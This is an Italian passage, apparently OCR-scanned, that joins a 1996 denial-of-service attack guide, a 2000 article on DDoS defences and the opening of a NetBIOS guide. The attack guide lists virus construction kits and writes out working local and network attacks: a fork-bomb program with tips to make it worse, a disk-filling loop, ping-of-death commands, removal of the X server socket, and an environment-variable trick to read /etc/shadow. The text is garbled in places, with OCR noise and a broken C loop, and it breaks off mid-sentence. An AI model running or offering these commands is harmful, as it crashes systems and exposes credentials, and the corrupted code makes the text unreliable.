I virus sono ancora il metodo d'attacco denial of service più diffuso. 


Non è vero che scrivere virus è difficile. Se conosci il linguaggio assembly e hai 
alcuni codici sorgente di virus è facile. Si possono scaricare degli strumenti per la 


costruzione di virus, per esempio: 


* Genvir. 


* VCS (Virus Construction Set). 

* VCL (Virus Construction Laboratory). 

* PS-MPC (Phalcon/Skism - Mass Produced Code Generator). 
* IVP (Instant Virus Production Kit). 

* G2 (G Squared). 


PS-MPC e VCL sono i migliori e possono aiutare il programmatore novello a capire 
come scrivere un Virus. 


Si può trovare anche uno strumento chiamato MtE. MtE trasformerà un virus in un 
virus "mutevole". Il motore mutevole di MtE è noto e può essere rintracciato da 
un antivirus. 


.C.21. ABUSO DI FTP ANONIMO 


Se un archivio FTP anonimo ha un'area scrivibile può essere manomesso per un attacco 
denial of service simile a quello .D.3. Noi così possiamo riempire l'hard disk. 


Un host inoltre può essere temporanemante inaccessibile a causa di eccessive 
richieste FTP. 


Pe maggiori informazioni su come proteggere un FTP anonimo, il documento della CERT 
"Anonymous FTP Abuses" potrebbe essere un buon punto d'inizio. 


.C.22. SYN FLOOD 


Sia 2600 e Phrack hanno pubblicato informazioni sull'attacco syn flood. 2600 ha anche 
pubblicato un exploit per l'attacco. 


Come sappiamo il pacchetto syn è usato in un handshake di 3 fasi. L'attacco syn flood 

è basato su un incompleto handshake. L'host che attacca manderà un flusso di pacchetti 
syn ma non risponerà con un pacchetto ACK. Lo stack TCP/IP aspetterà un certo periodo 
di tempo prima di interrompere la connessione, così un attacco syn flood manterrà quindi 
la connessione tcp_received in coda della macchina colpita. 


L'attacco syn flood è molto buono ed è facile trovare maggiori informazioni su di esso, 
per esempio: 


[.1.] http://www.eecs.nwu.edu/-jmyers/bugtrag/1354.html 
Articolo di Christopher Klaus che include una "soluzione". 


[.2.] http://jya.com/floodd.txt 
2600, Estate, 1996, pp. 6-11. FLOOD WARNING di Jason Fairlane 


[.3.] http://www.fc.net/phrack/files/p48/p48-14.html 
IP-spoofing Demystified by daemon9 / route / infinity 
per Phrack Magazine 


.C.23. PING FLOOD 


Non testato quanto può essere grande un attacco ping flood, ma potrebbe essere abbastanza 
grande. 


Sotto Unix possiamo trovare qualcosa come: ping -s host 
per mandaer pacchetti di 64 bytes. 


Se hai Windows 95, clicca sul pulsante Avvio, poi su Esegui e poi scrivi: 
PING -T -L 256 xxx.xxx.xxx.xx. Eseguilo circa 15 volte contemporaneamente. 


.C.24. MANDARE IN CRASH I SISTEMI CON IL PING DI WINDOWS 95 


Se qualcuno può pingare la tua macchina da una macchina Windows 95 egli può resettare o 
bloccare la tua macchina. L'attaccante scrive semplicemente: 


ping -1 65510 address.to.the.machine 
E la macchina si bloccherà o si riavvierà. 


Funziona con il kernel 2.0.7 fino alla versione 2.0.20 e 2.1.1 per Linux (crash). 
ATX4, OSF, HPUX 10.1,DUnix 4.0 (crash). 
OSF/1, 3.2C, Solaris 2.4 x86 (riavvio). 


.C.25. USO MALIZIOSO DEL MESSAGGIO DI RISPOSTA DELLE SUBNET MASK 


Il messaggio di riposta delle subnet mask è usato al riavvio, ma alcuni hosts 
accettano il messaggio ogni volta senza controllare. In questo modo tutte le 
comunicazioni a o dall'host sono interrotte. 


L'host non dovrebbe accettare il messaggio sempre ma solo durante il riavvio. 


.C.26. FLEXIm 


Ogni host che esegue FLEXIm ha la FLEXIm license manager daemon su ogni rete 
che per spegnere usano il comando FLEXIm Imdown. 


# Imdown -c /etc/licence.dat 
Imdown - Copyright (C) 1989, 1991 Highland Software, Inc. 


Shutting down FLEXIm on nodes: xxx 
Are you sure? [y/n]: y 

Shut down node xxx 

# 


.C.27. PARTIRE CON FTP BANALI 


Per partire con workstation senza disco si usa un ftp banale con rarp o bootp. 
Se un attaccante non è protetto può usare tftp per avviare l'host. 


.D. ATTACCARE DALL'INTERNO 


latta tia tia tia *Ie0Ta*Te®Ie0iatietia*Ie*Ta*T vie vi atTaviecia0Ie*Ta®TecTocIeviovi 


Solaris 2.3 avrà un kernel panic se è eseguito questo: 
$ndd /dev/udp udp_status 
La soluzione è installare la patch appropriata. 


.D.2. MANDARE IN CRASH IL SERVER X 


Se stickybit non è settato in /tmp, il file /tmp/.x11-unix/x0 può essere rimosso 
e il server X andrà in crash. 


Es: 
$ rm /tmp/.x11-unix/x0 


.D.3. RIEMPIRE L'HARD DISK 


Se lo spazio sul tuo hard disk non è limitato o se puoi usare /tmp è possibile 
riempire il file system. 


Es: 


while : ; 
mkdir .xxx 
cd XXX 
done 


.D.4. USO MALIZIOSO DI eval 


Alcuni vecchi sistemi andranno in crash se è eseguito eval ‘\!\!"' in una C-shell. 
Es: 
% eval \!\!" 


.D.5. USO MALIZIOSO DI fork() 


Se qualcuno esegue questo programma C++ il risultato sarà il crash della maggior 
parte dei sistemi. 


Es: 
#include <sys/types.h> 


#include <unistd.h> 
#include <iostream.h> 


main() 
{ 
int x; 
while(x=0;x<1000000;x++) 
{ 
system("uptime"); 
fork(); 
} 
} 


Puoi usare tutti i comandi che vuoi, ma uptime è bello perchè mostra il carico 
di lavoro. 


Per avere un attacco più grande e potente dovresti comunque rimpiazzare uptime 
con sync. Questo è molto cattivo. 


Se fai sul serio puoi instaurare un processo "figlio" per ogn processo "figlio" e 
avremo un incremento del carico di lavoro. 


Non ci sono buoni modi di fermare questo attacco e attacchi simili. Una soluzione 
potrebbe essere piazzare un limite di tempo sull'esecuzione e dimensione dei processi. 


.D.6. CREARE FILES CHE SONO DIFFICILI DA RIMUOVERE 


Tutti i files possono essere rimossi, ma quì c'è qualche idea: 
Bs. 


$ cat > -xxx 

NC 

$ Is 

-XXX 

$ rm -xxx 

rm: illegal option -- x 
rm: illegal option -- x 
rm: illegal option -- x 
usage: rm [-fiRr] file ... 


Es.2. 


$ touch xxx! 

$ rm xxx! 

rm: remove xxx! (yes/no)? y 
$ touch xxxxxxxxx! 

$ rm XXXXxxxxx! 

bash: !": event not found 


$ 
Altri metodi conosciuti sono files con caratteri dispari o spazi nel nome. 


Questi metodi potrebbero essere usati in combinazione con ".D.3. RIEMPIRE L' 
HARD DISK". Se vuoi rimuovere questi files devi usare degli script o un'interfaccia 
grafica come il File Manager di OpenWindow. Puoi anche tentare di usare: rm ./<file>. 
Dovrebbe funzionare per il primo esempio se hai una shell. 


.D.7. DIRECTORY NAME LOOKUPCACHE 


Directory name lookupcache (DNLC) è usato quando un file è aperto. DNLC associa 
il nome del file a un vnode. Ma DNLC può solo operare su files i quali nomi sono 
composti da un certo numero di caratteri (per SunOS 4.x fino a 14 caratteri, per 
Solaris 2.x fino a 30 caratteri). Questo significa che è facile eseguire un discreto 
attacco denial of service. 


Crea diciamo 20 directory (per iniziare) e metti 10 files vuoti in ogni directory. 
Fai sì che ogni nome di file abbia oltre i 30 caratteri ed esegui uno script che 
fa molti ls-al nelle directory. 


Se l'impatto non è grande abbastanza, dovresti creare più files o eseguire più 
processi. 


.D.8. ATTACCO CSH 


Esegui questo in /bin/csh (dopo le modifiche appropriate) e il livello di caricamento 
salirà di molto (100% del tempo della cpu) in poco tempo. 


II /bin/csh 
nodename : niololololoicicicicicioiolol e) 


.D.9. CREARE FILES IN /tmp 


Molti programmi creano files in /tmp, ma è difficile trattare del problema se 
il file esiste già. In alcuni casi questo potrebbe essere usato per un attacco 
denial of service. 


.D.10. USARE RESOLV_HOST_CONF 


Alcuni sistemi hanno un piccolo buco di sicurezza nel modo in cui usano la variabile 


RESOLV_HOST_CONEF. Noi possiamo mettere delle cose in esso e attraverso l'accesso 
ping avremo dei dati come /etc/shadow o potremo mandare in crash il sistema. La maggior 
parte dei sistemi andranno in crash se c'è /proc/kcore nella variabile e accedendo 

tramite ping. 


Es: 
$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf 


.D.11. SUN 4.X E LAVORI NASCOSTI 


Grazie a Mr David Honig <honig@amada.net> per il documento seguente: 

" Metti la stringa "a&" in un file chiamato "a" e esegui un "chomod +x a". Eseguendo 
"a" disattiverai lentamente una macchina SunOS 4.x, disabilitando anche il login root 
e riempiendo le tavole del kernel." 


" La cosa bella è la dimensione dello script, e quante poche battute di tasti ci vogliono 
per disattivare una macchina Sun come utente". 


.D.12. MANDARE IN CRASH DG/UX CON ULIMIT 


ulimit è usato per settare un limite sulle risorse di sistema disponibili alla shell. Se 
ulimit 0 è chiamato prima di /etc/passwd, sotto DG/UX, il file passwd sarà settato a 0. 


.D.13. NETTUNE E HP-UX 


lusr/contrib/bin/nettune è SETUID root su HP-UX, cioè ogni utente può resettare tutti gli 
ICMP, IP e i parametri TCP del kernel, per esempio i seguenti parametri: 


- arp_killcomplete 

- arp_killincomplete 
- arp_unicast 

- arp_rebroadcast 

- ioqmp_mask_agent 
- ip_defaultttl 

- ip_forwarding 

- ip_intrqmax 

- pmtu_defaulttime 
- tcp_localsubnets 

- tcp_receive 

- tcp_send 

- tcp_defaultttl 

- tcp_keepstart 

- tcp_keepfreq 

- tcp_keepstop 

- tcp_maxretrans 

- tcp_urgent_data_ptr 


- udp_cksum 

- udp_defaultttl 

- udp_newbcastenable 
- udp_pmtu 

- tcp_pmtu 

- tcp_random_seg 


La soluzione potrebbe essere settare il permesso appropriato a /sbin/mount_union: 
#chmod u-s /sbin/mount_union 


.D.14. SOLARIS 2.X E NES 


Se un processo sta scrivendo a NFS e l'utente supera lo spazio sul disco il processo 
andrà in un loop infinito. 


.D.15. STABILITà DEL SISTEMA COMPROMESSA DA MOUNT_UNION 


Eseguendo una sequenza di comandi mount_union ogni utente può causare un "ricaricamento" 
del sistema su tutti i FreeBSD 2.x prima del 18/05/1996. 


$ mkdir a 

$ mkdir b 

$ mount_union “/a “/b 

$ mount_union -b “/a “/b 


La soluzione potrebbe essere settare il permesso appropriato in /sbin/mount_union: 
#chmod u-s /sbin/mount_union 


.D.16. trap_ mon CAUSA KERNEL PANIC SOTTO SUNOS 4.1.X 


Eseguendo l'istruzione trap_mon da utente si può causare un kernel panic o un 
"window underflow watchdog reset" sotto SunOS 4.1.x, architettura sun4c. 


.E. DUMPING CORE 


latta ti atia tte *Te0Ta®Te0ievIatie0ia®TecTecTaviovi 


I core dumps non appartengono in realtà a questo documento ma li ho messi comunque. 


.E.2. USO MALIZIOSO DI NETSCAPE 


Sotto Netscape 1.1N questo collegamento causerà un segmentation fault e un core dump. 


<a name="http://xXX.XXX.XXX.XXX.XXX.XXX.XXX.XXX.XXX.XXX.KKK.KKX.KXX. 


.E.3. CORE DUMPED SOTTO WUFTPD 


Un core dumped potrebbe essere causato sotto wuftp con due metodi differenti: 


(1) pasv è dato (utente non collegato (ftp-n)). Quasi tutte le versioni 
ftpd di BSD. 

(2) Più di 100 argomenti sono dati con un comando eseguibile. Presente 
in tutte le versioni ftpd di BSD. 


.E.4. ld SOTTO SOLARIS/X86 


Sotto Solaris 2.4/X86 ld causa un core dump se è data l'opzione -s. 


.F. COME PROTEGGERE UN SISTEMA CONTRO GLI ATTACCHI DENIAL OF SERVICE? 


NNNNNNNNN NIN NININNINI NINNI INN NN NINNI NINNI NINNI NINNI NINNI NANNINI NANNINI 


Non puoi rendere il tuo sistema totalmente sicuro contro gli attacchi denial of 
service ma dall'esterno puoi fare molto. Ho messo questa lista insieme e spero 
che può essere di buona utilità. 


.F.1.2. PATCH DI SICUREZZA 


Installa sempre le appropriate patch di sicurezza. Non voglio inserire i numeri 
delle patch, ma non importa perchè comunque devi controllare che hai tutte le 
patch installate, quindi prendi una lista e controlla! Nota inoltre che le patch 
cambiano nel tempo e questa è una soluzione suggerita nei notiziari di sicurezza 
(es. CERT). 


.F.1.3. PORT SCANNING 


Controlla quali servizi hai. Non controllare manualmente o qualche file di configurazione, 
ma controlla le porte con sprobe o qualche altro port scanner. Attualmente dovresti farlo 
regolarmente per vedere che nessuno abbia installato un servizio che non vuoi sul 


sistema (per esempio un servizio per un sito pirata). 


Disabilita ogni servizi di cui non hai bisogno, come per esempio rexd, fingerd, systat, 
netstat, ruserd, sprayd, pop3, uucpd, echo, chargen, tftp, exec, ufs, daytime, time... 
Ogni combinazione di echo, time, daytime e chargen è possibile per entrare in un loop. 
Non c'è comunque bisogno di scartarle, così se vuoi disabilitare diventerai più sensibile 
al denial of service e non l'opposto. 


Attualmente i servizi possono essere trovati su molti sistemi che possono essere 
usati per denial of service e brute force hacking senza nessun logging. Per esempio 
Stock rexec non logga niente. La maggior parte di popd anche non loggano niente. 


.F.1.4. CONTROLLA GLI ATTACCHI DALL'ESTERNO DESCRITTI IN QUESTO 
DOCUMENTO 


Controlla gli attacchi descritti in questo documento e cerca la soluzione. Alcuni 
attacchi dovresti eseguirli tu stesso per vedere se sono efficaci sul tuo sistema, 
per esempio: 


- Bloccare X-Windows. 

- Uso malizioso di telnet. 

- Come disabilitare i servizi. 

- Kernel panic di SunOS. 

- Attaccare con i clients lynx. 

- Mandare in crash i sistemi con il ping di Windows. 


Testa il tuo sistema con molti servizi e osserva l'effetto. 


Nota che Solaris 2.4 e successivi hanno un limite sul numero di messaggi d'errore 
ICMP (1 ogni 500 ms penso) e questo può causare dei problemi. Ma puoi risolvere 
facilmente questo problema eseguendo questa riga: 


$ /usr/sbin/ndd -set /dev/ip ip_icmp_err_interval 0 


.F.1.5. CONTROLLA GLI ATTACCHI DALL'INTERNO DESCRITTI IN QUESTO 
DOCUMENTO 


Controlla gli attacchi dall'interno, sebbene è sempre possibile mandare in crash 
il sistema dall'interno anche se non vuoi che sia facile. Inoltre applica molte 
volte gli attacchi denial of service, per esempio: 


- Bloccare il server X: Se stickybit non è settato in /tmp si 
possono eseguire vari attacchi per guadagnare 


l'accesso. 


- Usare resolv_host_conf: Potrebbe essere usato per esporre dati 
personali come /etc/shadow. 


- Core dumped sotto wuftpd: Può essere usato per estrarre le password. 


Se non ho messo una soluzione, ho raccomandato altri documenti. Se no non conosco un 
documento con una soluzione che potevo raccomandare. In quei casi dovresti conttatare 
la tua compagnia. 


.F.1.6. SISTEMI DI MASSIMA SICUREZZA 


Pensa inoltre se potresti installare alcuni sistemi di massima sicurezza. Il sistema 

di base che dovresti installare è un logdaemon e un wrapper. Un firewall può anche 
essere buono, ma costoso. Gli strumenti gratuiti che possono essere scaricati da Internet 
sono per esempio: 


TIPO: NOME: INDIRIZZO: 

LOGDAEMON NETLOG ftp://net.tamu.edu/pub/security/'TAMU 
WRAPPER TCP WRAPPERS  ftp://cert.org/pub/tools/tcp_wrappers 
FIREWALL TIS ftp://ftp.tis.com/pub/firewalls/toolkit 


Nota che devi installare con cura il firewall TIS o potresti aprire nuovi buchi di 
sicurezza, ma è un ottimo pacchetto se hai delle conoscenze di base. 


E' anche buono rimpiazzare i servizi di cui ha bisogno, per esempio telnet, rlogin, 
rsh o altro, con strumenti con ssh. Ssh è gratis e può essere trovato a: 


ftp://ftp.cs.hut.fi/pub/ssh 


Gli indirizzi che ho messo sono siti per la distribuzione e non penso che ne dovresti 
usare altri, fatta eccezione per CERT. 


Per una lista di strumenti per la sicurezza gratuiti raccomando: 
"FAQ: Computer Security Frequently Asked Questions". 


.F.1.7. CONTROLLARE LA SICUREZZA 


Inoltre controlla la sicurezza regolarmente, per esempio esaminando i log di sistema, 
i files history... In ogni sistema senza altri sistemi di sicurezza alcuni strumenti 
possono essere trovati. Alcuni strumenti sono: 


- uptime 

- showmount 
- ps 

- netstat 

- finger 


(vedi il testo del man per maggiori informazioni). 


.F.1.8. MANTENERE AGGIORNATO 


E' molto importante essere aggiornati con i problemi di sicurezza. Ricorda inoltre che 

i siti, come CERT, avvisano quando il problema è già conosciuto dal pubblico "oscuro" 
da qualche tempo, perciò non aspettare. Le risorse seguenti ti aiutano a mantenerti 
aggiornato: 


- Mailing list di CERT. Manda una email a cert@cert.org per iscriversi alla 
lista 


- Mailing list di Bugtraq. Manda una email a bugtrag-request@fc.net. 
- Mailing list di WWW-security. Manda una email a www-security@ns2.rutgers.edu. 


.F.1.9. LEGGI QUALCOSA DI MEGLIO 


Comincia con i documenti su Internet. Mi dispiace dire che non ci sono molti documenti 
gratis disponibili, ma qui ho messo una piccola collezione. 


(1) I Rainbow books sono una lunga serie di libri gratis sulla sicurezza del computer. 
I cittadini degli USA possono prenderli da: 


INFOSEC AWARENESS OFFICE 
National Computer Security Center 
9800 Savage Road 

Fort George G. Meader, MD 20755-600 


Noi dobbiamo leggere i documenti dal web. Ogni documento non può essere trovato su internet. 
(2) "Improving the security of your Unix system" di Curry è anche buono se hai bisogno 

di conoscenze di base. Se non sai niente sulla sicurezza del computer non potevi trovare un 
inizio migliore. 


(3) "The WWW security FAQ" di Stein tratta la sicurezza W3 ed è il miglior documento che 
si può trovare su internet. 


(4) CERT ha pubblicato anche dei buoni documenti, come per esempio: 
- Anonymous FTP Abuses. 
- Email Bombing and Spamming. 
- Spoofed/Forged Email. 
- Protecting yourself from password file attacks. 


Penso comunque che l'ultimo documento ha tralasciato alcune cose. 


(5) Per una lunga lista di documenti raccomando: 
"FAQ: Computer Security Frequently Asked Questions". 


(6) Vedi anche la sezione ".G. LETTURE SUGGERITE" 


Potresti anche acquistare dei libri, ma non ne raccomando. 


.F.2. CONTROLLARE LE PRESTAZIONI 


Ci sono molti comandi e servizi che possono essere usati per controllare le prestazioni. 
Su internet si possono trovare almeno due buoni programmi gratuiti. 


.F.2.2. COMANDI E SERVIZI 


Per maggiori informazioni leggi il testo del man. 


netstat Mostra lo stato della rete. 

nfsstat Mostra le statistiche NFS. 

sar Riporta l'attività del sistema. 

vmstat Riporta le statistiche di memoria virtuale. 

timex Temporizza un comando, riporta i dati dei processi e le attività di sistema. 
time Temporizza un comando semplice. 

truss Traccia le chiamate e i segnali di sistema. 

uptime Mostra per quanto tempo il computer è stato acceso. 


Nota che se un server netstat pubblico puoi usare netstat dall'esterno. netstat può 
anche dare informazioni come i numeri di sequenza tcp e altro. 


.F.2.3. PRGORAMMI 


Proctool: Proctool è uno strumento gratis per Solaris che controlla i processi. 
ftp://opcom.sun.ca/pub/binaries/ 


Top: Top dovrebbe essere un programm più semplice di Proctool, ma è comunque buono. 


.F.2.4. RESOCONTI 


Per controllare le prestazioni devi avere delle informazioni per un lungo periodo di 
tempo. Tutti i sistemi Unix hanno dei log di resovonto per identificare quanto tempo, 
CPU e memoria usa un programma. Dovresti controllare il tuo manuale per controllare 
come abilitare questo servizio. 


Potresti anche inventare il tuo sistema di resoconto usando contrab e uno script con 
i comandi che vuoi eseguire. Fai eseguire lo script a contrab ogni giorno e controlli 
le informazioni una volta a settimana. Potresti far eseguire allo script: 


- netstat 
- lostat -D 
- vnstat 


.G. LETTURE SUGGERITE 
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(1) Hedrick, C. Routing Information Protocol. RFC 1058, 1988. 

(2) Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984. 
(3) Postel, J. Internet Control Message Protocol. RFC 792, 1981. 

(4) Harrenstien, K. NAME/FINGER Protocol, RFC 742, 1977. 

(5) Sollins, K.R. The TFTP Protocol, RFC 783, 1981. 

(6) Croft, W.J. Bootstrap Protocol, RFC 951, 1985. 


Molti documenti in questa categoria erano degli RFC. Un RFC è un documneto 
che descrive un protocollo. Le lettere RFC stanno per Request For Comment. 
Si presume che su internet si conoscano almeno quelli più comuni. Se vuoi 
saperne di più su un protocollo è sempre bene leggere l'appropriato RFC. 

Puoi trovare un indice sugli RFC all'indirizzo: 


http://pubweb.nexor.co.uk/public/rfc/index/rfc.html 


.F.2. INFORMAZIONI SULL'AGGIORNAMENTO 


(1) Mailing list di CERT. Manda una email a cert@cert.org per iscriverti. 
(2) Mailing list di Bugtraq. Manda una email a bugtrag-request@fc.net. 
(3) Mailing list di WWW-security. Manda una email a www-security@ns2.rutgers.edu. 
(4) Sun Microsystems Security Bulletins. 
(5) Vari articoli da: - comp.security.announce 
- comp.security.unix 
- comp.security.firewalls 
(6) Varie pubblicazioni di 40Hex. 


.F.3. INFORMAZIONI DI BASE 


(1) Husman, H. INTRODUKTION TILL DATASAKERHET UNDER X-WINDOWS, 1995. 
(2) Husman, H. INTRODUKTION TILL IP-SPOOFING, 1995. 
(3) I seguenti rainbow books: - Teal Green Book (Dizionario dei 

termini di sicurezza). 

- Bright Orange Book( Una guida per 

capire il controllo della sicurezza 

nei sistemi). 

- C1 Technical Report-001 

(Virus per il computer: prevenzione 

rivelazione e trattamento). 


(4) Ranum, Marcus. Firewalls, 1993. 

(5) Sun Microsystems, OpenWindows V3.0.1. User Commands, 1992. 

(6) Husman, H. ATTSPÀRA ODOKUMENTERADE SAKERHETSLUCKOR, 1996. 
(7) Dark OverLord, Unix Cracking Tips, 1989. 


(8) Shooting Shark, Unix Nasties, 1988. 

(9) LaDue, Mark.D. Hostile Applets on the Horizone, 1996. 

(10) Curry, D.A. Improving the security of your unix system, 1990. 
(11) Stein, L.D. The World Wide Web security FAQ, 1995. 

(12) Bellovin, S.M. Security Problems in the TCP/IP Protocol, 1989. 


.H. COPYRIHT 


Questo documento è Copyright (c) 1996 by Hans Husman. 


Si possono distribuire gratuitamente delle copie. Puoi distribuire, trasferire o 
diffondere questo documento elettronicamente. Non puoi fingere di averlo scritto tu. 
Questa notizia sui diritti deve essere mantenuta in ogni copia. Se vuoi rscrivere 
l'intero documento o una parte di questo documento con un altro mezzo che non è 
quello elettronico, chiedi il permesso all'autore. 


I. DISCLAIMER 


Le informazioni in questo documento potrebbero cambiare senza avviso. L'uso di 
queste informazioni costituiscono l'accettazione per l'uso in una condizione AS IS. 
Non ci sono garanzie che riguardano queste informazioni. In ogni caso l'autore non 
sarà responsabile per ogni danno che potrebbe essere collegato a questo documneto. 
L'uso di queste informazioni è a rischio dell'utente. 


Attacchi: Distributed Denial of Services (16 Febbraio 2000) 


A meno che non siate vissuti isolati nelle scorse settimane, avrete sicuramente sentito parlare dei 
sabotaggi recentemente effettuati contro alcuni dei principali siti Internet. 


Numerosi BIG della Rete sono stati messi in ginocchio da quello che sembra essere stato il più 
massiccio attacco mai lanciato contro importanti portali e siti web. 

Yahoo! è stato il primo a subirli, avendo riportato un blackout di tre ore domenica 6 febbraio. 
Buy.Com non era raggiungibile la mattina di lunedì 7, CNN ed eBay non lo erano nel pomeriggio, 
mentre Amazon e Zdnet sono rimasti isolati parecchie ore la notte di lunedì. 


Articoli tecnici hanno spiegato il fenomeno come un Distributed Denial of Services attack (DDOS): 
un genere di attacco nel quale i cosiddetti pirati (crackers) attivano un numero elevatissimo di false 
richieste da più macchine allo stesso server consumando le risorse di sistema e di rete del fornitore 
del servizio. In questo modo il provider *affoga* letteralmente sotto le richieste e non è più in grado 
di erogare i propri servizi, risultando quindi irraggiungibile. 

Alcuni dei network provider coinvolti hanno dichiarato di essere stato sommersi da oltre 1 Gb al 
secondo di traffico. 

Anche se questo genere di attacco non è affatto nuovo sulla Rete, non ne erano mai stati rilevati su 
così vasta scala e su così tanti obiettivi importanti quasi in contemporanea. 

Gli antenati degli attuali attacchi si manifestavano andando ad esaurire risorse hardware della 
vittima, quali lo spazio su disco, la memoria e la CPU: ciò era ottenibile spedendo pochi pacchetti 
malformati che mandavano in crash il sistema remoto. Il più noto tra le utility di questo genere è 
stato nuke e il più popolare WinNuke, che mandava in crash il famoso OS della casa di Redmond 
(WinNuke è ancora in grado di mandare in crash molte macchine desktop Win95 e server NT se 
non hanno applicato le opportune patch, N.d.R.). 

Il primo (e il più abusato) prodotto di DoS che ha acquisito notorietà è stato lo smurf attack che 
tutt'oggi è in grado di paralizzare reti con tecnologie non aggiornate (generalmente piccole/medie 
aziende e ISP locali). 

In seguito è venuto The LowDown, conosciuto anche come Network Saturation Attack o 
Bandwidth Consumption Attack: un nuovo attacco DoS in grado di inondare un network di un 
numero impressionante di pacchetti. I router e server che subiscono l'attacco, nel tentativo di gestire 
correttamente il traffico compiono un eccessivo lavoro che li mette in crisi. Ovviamente l'eccesso di 
traffico ostile rende impossibile anche il traffico lecito (posta, web, ecc.) bloccando quindi in pochi 
minuti intere reti. 

La generazione successiva (l'attuale) è appunto quella dei Distributed Denial of Service (DDoS) 
attack. Spingendo all'eccesso l'idea del network saturation attack, il DDoS ripete lo stesso approccio 
utilizzando però diversi punti d'ingresso contemporanei: in questo modo un cracker è in grado di 
mettere in ginocchio sistemi più grandi che sarebbero indifferenti ad un singolo flood. Per effettuare 
questo genere di operazione si deve poter installare un proprio agente sui sistemi da cui si vuole 
scatenare l'attacco stesso. 

È quindi una tecnica che viene preparata per tempo, attrezzandosi con un pool di macchine 
compromesse da poter scagliare contro il sistema vittima. 

David Dittrich ha fatto un eccellente lavoro descrivendo i diversi tools attualmente usati per questo 
genere di attacco. L'analisi di questi prodotti è disponibile su 
http://staff.washington.edu/dittrich/misc; nello specifico: 


- Trinoo - http://staff.washington.edu/dittrich/misc/trinoo. analysis 

- Tribe Flood Network - http://staff.washington.edu/dittrich/misc/tfn.analysis 
- Stacheldraht - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis 
- TFN2K - http://packetstorm.securify.com/distributed/TFN2k_Analysis.htm 


Su http://www.hackernews.com/bufferoverflow/00/dosattack/dosattack.html è disponibile 
un'interessante descrizione - più divulgativa delle precedenti - sui vari tipi di denial of service 
attack. 

La principale domanda cui tutti cercano di rispondere è chi sia stato a effettuare questi attacchi e 
perché. 

Inoltre sono stati organizzati diversi incontri per cercare di capire come sono condotti questi 
attacchi e come sia possibile difendersi. 


Sulla Rete sono disponibili alcune note sul workshop del CERT (=Computer Emergency Response 
Team) presso: 


http://www.cert.org/reports/dsit_workshop.pdf 


e alcune note esplicative su: 
- http://staff.washington.edu/dittrich/talks/cert/ 


Il CERT ha inoltre pubblicato un avviso a questo riguardo proprio lo scorso mese di gennaio: 
- http://www.cert.org/advisories/CA-2000-01.html 


Tra le diverse ipotesi prese in considerazione vi è anche quella di un'azione portata avanti dai 
servizi segreti americani per sensibilizzare l'opinione pubblica sulla questione della sicurezza su 
Internet e far approvare più rapidamente il nuovo testo di legge (Electronic law enforcement) 
attualmente allo studio del parlamento americano, che introdurrebbe severe restrizioni e controlli 
sulla Rete. Maggiori dettagli su questa ipotesi presso 
http://listserv.syr.edu/scripts/wa.exe?A2=ind0002&L=foi-1&F=&S=&P=9484 


In realtà questi attacchi sono resi possibili dall'attuale implementazione del protocollo TCP/IP. Per 
una scelta di realizzazione, infatti, non è stata posta particolare sicurezza sull'identificazione del 
mittente di ogni pacchetto e se questo da una parte consente garanzie di anonimato, dall'altro può 
essere sfruttato con apposite tecniche per far credere che il pacchetto provenga da sistemi differenti 
da quello effettivo. Queste limitazioni saranno in parte superate dalla prossima adozione di IPv6. 
Ad oggi non esiste una soluzione unica al problema ma esistono molti modi per tutelarsi; nei 
paragrafi che seguono ne presentiamo alcuni. 


Network Incoming Filtering 

Tutti gli ISP dovrebbero implementare dei filtri in ingresso sui propri router e firewall in modo da 
bloccare i pacchetti che contengano informazioni alterate sulla loro provenienza (in gergo 
SPOOFED). 

Anche se questo accorgimento non impedisce il verificarsi di un attacco, consente di ricostruire la 
provenienza dei pacchetti in maniera più semplice e veloce. 

Per maggiori informazioni sui filtri in ingresso: RFC 2267 su 
http://info.internet.isi.edu/innotes/rfc/files/rfc2267.txt 


Limit Network Traffic 

La maggior parte dei router consente oggi di limitare la quantità di banda usata da un particolare 
servizio. 

Questa capacità è spesso definita come traffic shaping o Quality of Service (QoS) ed è 
implementabile anche utilizzando una piccola macchina Linux come gateway. 


La Cisco chiama questa capacità Committed Access Rate (CAR). 

Sfruttando questa caratteristica, per esempio, è possibile configurare i propri sistemi in modo da 
fornire più banda ai servizi web a discapito di altri servizi (per esempio ftp). 

Com'è facilmente intuibile, questa capacità può essere usata anche in maniera reattiva per fermare 
un DDoS. 

Per esempio se l'attacco usa pacchetti ICMP o pacchetti TCP SYN è possibile configurare i sistemi 
in modo da limitare la banda utilizzabile da questi pacchetti. 

Per maggiori informazioni: 


http://www.cisco.com/warp/public/707/newsflash.html 


http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/12cgcr/gos_c/qepart4/qcpolts.ht 
m 

Intrusion Detection Systems e Host Auditing Tools 

È possibile utilizzare un Intrusion Detection System o un tool di auditing per identificare 
malintenzionati mentre cercano di comunicare con i loro sistemi slave, master o agent. Ciò consente 
di sapere se alcune macchine all'interno della propria rete sono utilizzate per lanciare un genere di 
attacco conosciuto ma non sempre sono in grado di identificare nuove varianti o prodotti nuovi. 

La maggior parte delle soluzioni commerciali sono ormai in grado di riconoscere Trinoo, TNF o 
Stacheldraht. 

L'FBI fornisce gratuitamente un prodotto chiamato "find _ddos" che cerca all'interno del filesystem 
prodotti di DDoS quali Trinoo, TNF, TNF2K e Stacheldraht 

Il prodotto è disponibile solo in formato binario sia per Solaris (Sparc e Intel) che per Linux (Intel): 


http://www.fbi.gov/nipc/trinoo.htm 


(non dimentichiamo che l'assenza di sorgenti rende l'applicativo non controllabile e quindi, 
potenzialmente, potrebbe contenere delle backdoors, N.d.R.) 

Network Auditing Tools 

Sono numerosi i programmi che consentono l'analisi di una intera rete aziendale per verificare la 
presenza di agenti per DDoS. 

Dave Dittrich, Marcus Ranum e altri esperti hanno sviluppato un prodotto di cui rilasciano anche i 
sorgenti denominato dds: 


http://staff.washington.edu/dittrich/misc/ddos_scan.tar 


con il quale è possibile identificare Trinoo, TFN e Stacheldraht. 


GUIDA AL NETBIOS 


CHE COSÌ IL NetBIOS ?! 


Il NetBIOS (Network Basic Input/Output System) è stato originariamente 
sviluppato da IBM e Sytek come un'API (Application Programming Interface) per 


permettere a programmi client di accedere a delle risorse presenti in una LAN 
(Local Access Network). Dalla sua creazione, il NetBIOS è diventata la base 
di molte altre applicazioni per la rete. In senso stretto, il NetBIOS non è 

altro che un'interfaccia per accedere a dei servizi di una rete. 


Il NetBIOS, un tipo di software sviluppato per collegare un sistema operativo 

